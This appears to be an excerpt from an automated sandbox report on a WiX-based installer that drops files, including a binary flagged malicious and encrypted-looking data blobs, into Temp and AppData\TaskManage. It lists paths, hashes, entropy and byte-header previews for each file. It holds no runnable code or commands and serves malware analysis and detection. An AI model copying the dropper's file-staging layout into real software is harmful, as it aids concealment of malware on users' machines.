                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):664064
                                                                                                                                                                  Entropy (8bit):6.953961612144461
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                  MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                  SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                  SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                  SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\hypochondriac.xlsx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60283
                                                                                                                                                                  Entropy (8bit):4.569551839311306
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                  MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                  SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                  SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                  SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):421200
                                                                                                                                                                  Entropy (8bit):6.59808962341698
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                  MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                  SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                  SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                  SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):770384
                                                                                                                                                                  Entropy (8bit):6.908020029901359
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                  MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                  SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                  SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                  SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\wiggery.bmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4567853
                                                                                                                                                                  Entropy (8bit):7.952114001019503
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                                  MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                                  SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                                  SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                                  SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

                                                                                                                                                                  C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):15692672
                                                                                                                                                                  Entropy (8bit):7.995895236161738
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
                                                                                                                                                                  MD5:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                                  SHA1:EC499500172CA2CC76C5B30ECA34FCEB9BACCE0D
                                                                                                                                                                  SHA-256:C5056AC95A2002BC08CB0EC8DBF064F78DFF400642EC1A6FC2A132984A7C1D99
                                                                                                                                                                  SHA-512:80A87456A9B2AE9344F42A2F09F29B4CBCDBDA61418270EF1BAF11399C7E0FAC0C6A95D51682BA6205DB908B84E17D7C4A3FF78EBAC3EFEC75F5298B56CBEB7A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................$:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...$:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\BootstrapperApplicationData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (449), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1986
                                                                                                                                                                  Entropy (8bit):3.7259224395984756
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:y+03qHhhOFnquPpne1oucb+JH0w//yccuTZxQDOQrciGxr91Dl:X0nNhn6Ug0wXyczx8gVxrx
                                                                                                                                                                  MD5:3DA2E442D7803E1DADC2E8D8F383B817
                                                                                                                                                                  SHA1:1AC2C5AF9ECD7576173DFC41D48D650EBE3F245B
                                                                                                                                                                  SHA-256:5C0771EC10DD07A00F1302EB662B9B0389F62FFC0CFC68423451575D15749617
                                                                                                                                                                  SHA-512:8947DD3861F20CD7AFE9F8E251106B5B66519217CF26B0D65C1AC6516CF15C8F447FA27F817118CF81F22008AB39C0BFF3637607A1D4289CF9AD8DD08659AE0B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".H.e.b.e.p.h.r.e.n.i.a.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.9.4.6.b.b.f.d.e.-.2.e.2.c.-.4.5.c.e.-.9.b.b.b.-.9.a.5.3.3.c.5.3.c.d.8.8.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.8.A.C.9.6.A.5.B.-.2.5.D.4.-.4.2.0.7.-.A.A.1.4.-.9.6.4.D.F.4.7.4.3.F.D.6.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".F.l.o.t.s.a.m.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".A.p.p.V.T.e.m.p.l.a.t.e.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".3.1.6.4.1.6.". .P.a.c.k.a.g.e.S.i.z.e.=.".3.1.6.4.1.6.". .I.n.s.t.a.l.l.e.d.S.i.z.e.=.".

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):180800
                                                                                                                                                                  Entropy (8bit):5.521664858470418
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:eliOVvlKspsvyqocbjJscJcWPKMFWb4El8BdNfgJ4/zF9Q+QxgZhBax+opwMhkMf:F4Ua+4pl9D
                                                                                                                                                                  MD5:CA03420E7D92D1E8C8726615879FE50D
                                                                                                                                                                  SHA1:49A62B1AB815C7A49E1F082B1CF27D3C1E1619BF
                                                                                                                                                                  SHA-256:501B72E6C0FAF72779E013029BEAB90B6E02DD4FFE89DC6726FB897EF96274BF
                                                                                                                                                                  SHA-512:8A963607B28D29F518D656B2FE39C843894F6E378577F1A1206AC633A10585334FA04B67565F1DAF07F89A727D98C3657317405510E4F4AA88C61A1EBF19733D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j....O...O...O..S../O...o..*O...o..,O...O..+O...O..N..LP..?O..om..=O...I../O...o../O..Rich.O..........PE..L....wCB...........!.........0......I..............[.................................M.................................../..d...........X.......................L... ................................................................................text...0........................... ..`.rdata..L_.......`..................@..@.data...l...........................@....rsrc...X...........................@..@.reloc........... ..................@..B.wCB`....wCBm....wCBw....wCB.....wCB.....wCB.....wCB.....wCB.....wCB.....wCB....^xCB............KERNEL32.dll.NTDLL.DLL.USER32.dll.GDI32.dll.WINSPOOL.DRV.comdlg32.dll.COMCTL32.dll.ADVAPI32.dll.SHELL32.dll.VERSION.dll.MSVCRT.dll..............................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtCore4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2598912
                                                                                                                                                                  Entropy (8bit):6.6049974235008655
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                  MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                  SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                  SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                  SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtGui4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8581632
                                                                                                                                                                  Entropy (8bit):6.736578346160889
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                  MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                  SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                  SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                  SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtNetwork4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1053696
                                                                                                                                                                  Entropy (8bit):6.539052666912709
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                  MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                  SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                  SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                  SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtXml4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):356352
                                                                                                                                                                  Entropy (8bit):6.447802510709224
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                  MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                  SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                  SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                  SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6487736
                                                                                                                                                                  Entropy (8bit):7.518089126573906
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                  MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                  SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                  SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\StarBurn.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):664064
                                                                                                                                                                  Entropy (8bit):6.953961612144461
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                  MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                  SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                  SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                  SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\hypochondriac.xlsx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60283
                                                                                                                                                                  Entropy (8bit):4.569551839311306
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
